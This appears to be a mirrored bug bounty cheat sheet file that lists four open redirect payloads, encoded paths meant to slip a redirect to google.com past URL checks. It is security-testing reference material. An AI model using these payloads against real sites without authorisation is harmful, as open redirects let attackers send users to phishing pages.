mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-26 04:50:19 +00:00
17 lines
134 B
Markdown
17 lines
134 B
Markdown
|
## Open Redirect
|
||
|
|
||
|
```
|
||
|
/%09/google.com
|
||
|
```
|
||
|
|
||
|
```
|
||
|
/%5cgoogle.com
|
||
|
```
|
||
|
|
||
|
```
|
||
|
//www.google.com/%2f%2e%2e
|
||
|
```
|
||
|
|
||
|
```
|
||
|
//www.google.com/%2e%2e
|
||
|
```
|